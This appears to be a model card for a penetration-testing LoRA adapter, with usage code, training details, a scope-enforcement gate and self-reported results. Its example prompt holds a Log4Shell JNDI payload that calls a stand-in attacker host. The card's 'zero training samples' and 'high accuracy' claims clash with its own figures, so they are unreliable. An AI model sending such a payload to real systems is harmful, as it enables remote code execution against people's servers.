vext-pentest-7b

A security-specialized language model by VEXT Labs Inc for autonomous penetration testing and vulnerability assessment.

Built as a LoRA adapter on Qwen/Qwen2.5-7B-Instruct, fine-tuned on real-world security testing data including tool output interpretation, attack planning, vulnerability classification, and remediation guidance.

What This Model Does

vext-pentest-7b is trained to:

  • Interpret security tool output: parse and reason about results from nuclei, dalfox, sqlmap, gobuster, naabu, and 20+ other security tools
  • Plan attack strategies: given a target scope and reconnaissance data, decide which tools to run and in what order
  • Classify vulnerabilities: distinguish true positives from false positives with high accuracy
  • Generate remediation advice: provide actionable fix recommendations for discovered vulnerabilities

Usage

With vLLM (Recommended for Production)

# Start vLLM with LoRA support
python -m vllm.entrypoints.openai.api_server \
    --model Qwen/Qwen2.5-7B-Instruct \
    --enable-lora \
    --lora-modules vext-pentest-7b=/path/to/adapter \
    --max-lora-rank 32

With PEFT + Transformers

from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer

# Load the base model, then attach the LoRA adapter on top of it
base = AutoModelForCausalLM.from_pretrained("Qwen/Qwen2.5-7B-Instruct", torch_dtype="auto", device_map="auto")
model = PeftModel.from_pretrained(base, "VextLabs/vext-pentest-7b")
tokenizer = AutoTokenizer.from_pretrained("VextLabs/vext-pentest-7b")

# System prompt sets the role; the user turn carries the raw tool output to analyze
messages = [
    {"role": "system", "content": "You are a security testing agent. Analyze the following tool output and identify vulnerabilities."},
    {"role": "user", "content": "Nuclei scan results:\n[critical] CVE-2021-44228 Log4Shell detected at /api/login\nPOC: ${jndi:ldap://attacker.com/a}"}
]

# Render the chat template, generate, and print the decoded sequence (prompt included)
text = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
inputs = tokenizer(text, return_tensors="pt").to(model.device)
output = model.generate(**inputs, max_new_tokens=512)
print(tokenizer.decode(output[0], skip_special_tokens=True))

Training Details

Parameter | Value
--- | ---
Base model | Qwen/Qwen2.5-7B-Instruct
Method | LoRA (Low-Rank Adaptation)
Rank | 32
Alpha | 64
Target modules | k_proj, v_proj, q_proj, down_proj, o_proj, gate_proj, up_proj
Training steps | 5,000
Training samples | 0
Final loss | 0.5114268112182617
Precision | bfloat16

Training Data

Fine-tuned on proprietary security testing data generated by the VEXT platform, including:

  • Tool execution traces (input parameters, raw output, parsed results)
  • Attack planning decisions (which tool to use, why, expected outcomes)
  • Vulnerability validation (true positive vs false positive classification)
  • Multi-step attack chains (reconnaissance → enumeration → exploitation)

Data was collected from authorized testing against intentionally vulnerable applications (OWASP Juice Shop, DVWA, bWAPP, WebGoat, and others) and authorized bug bounty targets.

Responsible Use

This model is intended for authorized security testing only. It should be used:

  • Within the scope of authorized penetration testing engagements
  • Against applications you own or have explicit permission to test
  • In CTF (Capture the Flag) competitions and security training environments
  • For defensive security research and vulnerability assessment

Do not use this model for unauthorized access to computer systems.
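
Because the model decides which tools to run against a target scope, the scope requirement above is best enforced in code rather than left to the prompt. The following is an added example, not part of the model card or VEXT's code: a gate that checks each model-proposed action against the engagement scope before any tool is launched. The scope entries, the allowed-tool subset, the action format and the function names are all assumptions made for illustration.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed engagement scope (assumption, not from the model card).
SCOPE_HOSTS = {"juice-shop.lab.example", "*.staging.lab.example"}
SCOPE_NETS = [ipaddress.ip_network("10.20.0.0/24")]
# Subset of the tools the card names; which ones an engagement permits is an assumption.
ALLOWED_TOOLS = {"nuclei", "gobuster", "naabu"}


def host_in_scope(host: str) -> bool:
    """True if host is an authorized IP address or hostname."""
    host = host.rstrip(".").lower()
    if not host:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None:
        return any(ip in net for net in SCOPE_NETS)
    for entry in SCOPE_HOSTS:
        if entry.startswith("*."):
            # Wildcard matches subdomains only, on a label boundary.
            if host.endswith(entry[1:]):
                return True
        elif host == entry:
            return True
    return False


def check_action(action: dict) -> tuple[bool, str]:
    """Validate one model-proposed action of the form {"tool": ..., "target": ...}."""
    tool, target = action.get("tool"), action.get("target")
    if not isinstance(tool, str) or tool not in ALLOWED_TOOLS:
        return False, f"tool not allowed: {tool!r}"
    if not isinstance(target, str) or not target:
        return False, "missing target"
    try:
        # Accept bare hosts as well as URLs; urlsplit needs "//" to find the host.
        parsed = urlsplit(target if "//" in target else "//" + target)
        host = parsed.hostname or ""
    except ValueError:
        return False, "unparseable target"
    if "@" in parsed.netloc:
        return False, "userinfo in target rejected"
    if not host_in_scope(host):
        return False, f"target out of scope: {host!r}"
    return True, "ok"
```

The gate fails closed: anything it cannot parse, or whose real host differs from what the string appears to name, is rejected rather than passed to a tool.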

About VEXT Labs Inc

VEXT Labs is building autonomous security testing agents that combine LLM reasoning with real security tools. Our agents run full penetration tests, from reconnaissance to exploitation to reporting, with human-level decision making.

Learn more at tryvext.com

License

Apache 2.0

Evaluation results

  • Validated Findings (True Positives) on VEXT Security Testing Data: 139.000 (self-reported)
  • Total Findings Generated on VEXT Security Testing Data: 1977.000 (self-reported)
  • Unique Vulnerability Types on VEXT Security Testing Data: 77.000 (self-reported)
  • OWASP Categories Covered on VEXT Security Testing Data: 8.000 (self-reported)
  • Autonomous Runs on VEXT Security Testing Data: 306.000 (self-reported)